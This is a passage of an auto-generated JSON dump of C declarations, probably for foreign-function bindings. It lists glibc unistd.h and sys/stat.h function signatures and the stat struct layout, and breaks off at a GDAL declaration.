"bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "unlinkat", "ns": 0, "location": "/usr/include/unistd.h:829:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "rmdir", "ns": 0, "location": "/usr/include/unistd.h:834:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tcgetpgrp", "ns": 0, "location": "/usr/include/unistd.h:838:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "tcsetpgrp", "ns": 0, "location": "/usr/include/unistd.h:841:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__pgrp_id", "type": { "tag": "__pid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getlogin", "ns": 0, "location": "/usr/include/unistd.h:848:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "getlogin_r", "ns": 0, "location": "/usr/include/unistd.h:856:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__name_len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setlogin", "ns": 0, "location": "/usr/include/unistd.h:861:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "optarg", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:36:14", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "extern", "name": "optind", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:50:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "opterr", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:55:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "optopt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:59:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getopt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:91:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "___argc", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "___argv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__shortopts", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "gethostname", "ns": 0, "location": "/usr/include/unistd.h:877:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sethostname", "ns": 0, "location": "/usr/include/unistd.h:884:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sethostid", "ns": 0, "location": "/usr/include/unistd.h:889:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__id", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getdomainname", "ns": 0, "location": "/usr/include/unistd.h:895:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setdomainname", "ns": 0, "location": "/usr/include/unistd.h:897:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vhangup", "ns": 0, "location": "/usr/include/unistd.h:904:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "revoke", "ns": 0, "location": "/usr/include/unistd.h:907:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "profil", "ns": 0, "location": "/usr/include/unistd.h:915:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__sample_buffer", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__offset", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__scale", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "acct", "ns": 0, "location": "/usr/include/unistd.h:923:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getusershell", "ns": 0, "location": "/usr/include/unistd.h:927:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "endusershell", "ns": 0, "location": "/usr/include/unistd.h:928:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "setusershell", "ns": 0, "location": "/usr/include/unistd.h:929:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "daemon", "ns": 0, "location": "/usr/include/unistd.h:935:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nochdir", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__noclose", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "chroot", "ns": 0, "location": "/usr/include/unistd.h:942:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getpass", "ns": 0, "location": "/usr/include/unistd.h:946:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__prompt", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "fsync", "ns": 0, "location": "/usr/include/unistd.h:954:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "gethostid", "ns": 0, "location": "/usr/include/unistd.h:967:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "sync", "ns": 0, "location": "/usr/include/unistd.h:970:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "getpagesize", "ns": 0, "location": "/usr/include/unistd.h:976:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getdtablesize", "ns": 0, "location": "/usr/include/unistd.h:981:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "truncate", "ns": 0, "location": "/usr/include/unistd.h:991:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__length", "type": { "tag": "__off_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ftruncate", "ns": 0, "location": "/usr/include/unistd.h:1014:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__length", "type": { "tag": "__off_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "brk", "ns": 0, "location": "/usr/include/unistd.h:1035:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__addr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sbrk", "ns": 0, "location": "/usr/include/unistd.h:1041:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__delta", "type": { "tag": "intptr_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "syscall", "ns": 0, "location": "/usr/include/unistd.h:1056:17", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__sysno", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lockf", "ns": 0, "location": "/usr/include/unistd.h:1079:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__cmd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__len", "type": { "tag": "__off_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fdatasync", "ns": 0, "location": "/usr/include/unistd.h:1115:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fildes", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "crypt", "ns": 0, "location": "/usr/include/unistd.h:1124:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__key", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__salt", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "getentropy", "ns": 0, "location": "/usr/include/unistd.h:1161:5", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__length", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "struct", "ns": 0, "name": "stat", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:46:8", "bit-size": 1152, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "st_dev", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__dev_t" } }, { "tag": "field", "name": "st_ino", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__ino_t" } }, { "tag": "field", "name": "st_nlink", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__nlink_t" } }, { "tag": "field", "name": "st_mode", "bit-offset": 192, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "__mode_t" } }, { "tag": "field", "name": "st_uid", "bit-offset": 224, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "__uid_t" } }, { "tag": "field", "name": "st_gid", "bit-offset": 256, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "__gid_t" } }, { "tag": "field", "name": "__pad0", "bit-offset": 288, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "st_rdev", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__dev_t" } }, { "tag": "field", "name": "st_size", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__off_t" } }, { "tag": "field", "name": "st_blksize", "bit-offset": 448, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__blksize_t" } }, { "tag": "field", "name": "st_blocks", "bit-offset": 512, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__blkcnt_t" } }, { "tag": "field", "name": "st_atim", "bit-offset": 576, "bit-size": 128, "bit-alignment": 64, "type": { "tag": ":struct", "name": "timespec", "id": 18 } }, { "tag": "field", "name": "st_mtim", "bit-offset": 704, "bit-size": 128, "bit-alignment": 64, "type": { "tag": ":struct", "name": "timespec", "id": 18 } }, { "tag": "field", "name": "st_ctim", "bit-offset": 832, "bit-size": 128, "bit-alignment": 64, "type": { "tag": ":struct", "name": "timespec", "id": 18 } }, { "tag": "field", "name": "__glibc_reserved", "bit-offset": 960, "bit-size": 192, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": "__syscall_slong_t" }, "size": 3 } }] }, { "tag": "function", "name": "stat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:205:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fstat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:210:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fstatat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:234:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lstat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:259:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "chmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:280:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lchmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:287:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fchmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:293:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fchmodat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:299:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "umask", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:308:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__mask", "type": { "tag": "__mode_t" } }], "return-type": { "tag": "__mode_t" } }, { "tag": "function", "name": "mkdir", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:317:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mkdirat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:324:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mknod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:332:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }, { "tag": "parameter", "name": "__dev", "type": { "tag": "__dev_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mknodat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:339:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }, { "tag": "parameter", "name": "__dev", "type": { "tag": "__dev_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mkfifo", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:346:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mkfifoat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:353:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "utimensat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:360:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__times", "type": { "tag": ":array", "type": { "tag": ":struct", "name": "timespec", "id": 18 }, "size": 2 } }, { "tag": "parameter", "name": "__flags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "futimens", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:368:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__times", "type": { "tag": ":array", "type": { "tag": ":struct", "name": "timespec", "id": 18 }, "size": 2 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fxstat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:395:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fildes", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stat_buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__xstat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:397:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__stat_buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__lxstat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:399:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__stat_buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fxstatat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:401:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fildes", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__stat_buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "stat", "id": 55 } } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__xmknod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:438:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }, { "tag": "parameter", "name": "__dev", "type": { "tag": ":pointer", "type": { "tag": "__dev_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__xmknodat", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:441:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ver", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__mode", "type": { "tag": "__mode_t" } }, { "tag": "parameter", "name": "__dev", "type": { "tag": ":pointer", "type": { "tag": "__dev_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFOpen", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:85:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": 